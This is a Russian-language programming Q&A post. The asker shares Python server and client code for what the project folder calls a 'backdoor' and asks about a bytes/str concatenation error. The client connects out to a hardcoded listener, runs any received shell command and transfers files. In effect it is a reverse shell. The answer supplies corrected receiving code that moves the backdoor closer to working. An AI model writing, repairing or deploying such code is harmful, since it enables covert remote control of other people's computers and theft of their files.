# TypeError: can only concatenate str (not "bytes") to str

Tags: python, python-3.x, json, сокет

Опять у моей программы для дист. управления возникли проблемы. А именно вышла новая ошибка в получении команды:

```
Traceback (most recent call last):
  File "C:\Users\maksa\OneDrive\Рабочий стол\backdoor\main.py", line 65, in <module>
    my_Conn.run()
  File "C:\Users\maksa\OneDrive\Рабочий стол\backdoor\main.py", line 46, in run
    command = self.reliable_receive()
  File "C:\Users\maksa\OneDrive\Рабочий стол\backdoor\main.py", line 20, in reliable_receive
    json_data = json_data + self.connection.recv(1024)
TypeError: can only concatenate str (not "bytes") to str
```

Код сервера:

```
import socket, json, base64

class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connection")
        self.conn, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.conn.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.conn.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execRemote(self, command):
        self.reliable_send(command)
        
        if command[0] == "exit":
            self.conn.close()
            exit()
    
        return self.reliable_receive()

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Download successful."

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def run(self):
        while True:
            command = input(">> ")
            command = command.split(" ")

            try:
                if command[0] == "upload":
                    file_content = self.read_file(command[1])
                    command.append(file_content)

                result = self.execRemote(command)

                if command[0] == "download":
                    result = self.write_file(command[1], result)
                
            except Exception:
                result = "[-] Error during command execution."
                
            print(result)

my_Listener = Listener("192.168.0.11", 4444)
my_Listener.run()
```

Код клиента(в нём ошибка и кроеться):

```
import socket
import subprocess
import json
import base64


class Main:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data.decode('cp866'))
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def executeCommand(self, command):
        try:
            return subprocess.check_output(command, shell=True)
        except subprocess.CalledProcessError:
            return "[-] Error during command execution."

    def cwdt(self, path):
        os.chdir(path)
        return "[+] Changing working directory to " + path

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Upload successful."

    def run(self):
        while True:
            command = self.reliable_receive()
            try:
                if command[0] == "exit":
                    self.connection.close()
                    exit()
                elif command[0] == "cd" and len(command) > 1:
                    commandResult = self.cwdt(command[1])
                elif command[0] == "download":
                    commandResult = self.read_file(command[1])
                elif command[0] == "upload":
                    commandResult = self.write_file(command[1], command[2])
                else:
                    commandResult = self.executeCommand(command)
            except Exception:
                commandResult = "[-] Error during command execution."

            self.reliable_send(commandResult)

my_Conn = Main("192.168.0.11", 4444)
my_Conn.run()
```

Answer (score 1):

Ошибка из-за того, что в функции `reliable_receive` метод `recv` возвращает набор байт, а `json_data` у вас инициализировано как пустая строка. Байты к строке добавить нельзя, о чем и говорит ошибка ("можно конкатенировать только строки (не байты) к строке").

Вообще у вас при первом получении возвращается результат, поэтому нет смысла инициализировать переменную, можно просто получить данные из `recv`, потом этот набор байт декодировать в строку (`json_data.decode()`, или с указанием конкретной кодировки, например `json_data.decode('utf-8')`), потом разобрать как json:

```
def reliable_receive(self):
    while True:
        try:
            json_data = self.connection.recv(1024)
            return json.loads(json_data.decode('utf-8'))
        except ValueError:
            continue
```

Если нужно все-таки накапливать получаемые байты в `json_data`, то и переменную нужно инициализировать как пустую байтовую строку (`json_data = b""`), тогда к ней можно будет добавлять байты.

Comment: Нет, не работает, прописал как надо, а в итоге всё тоже самое

Comment: Не может то же самое. Если то же самое - значит вы ничего не изменили. Напишите что именно прописали, и конкретную ошибку.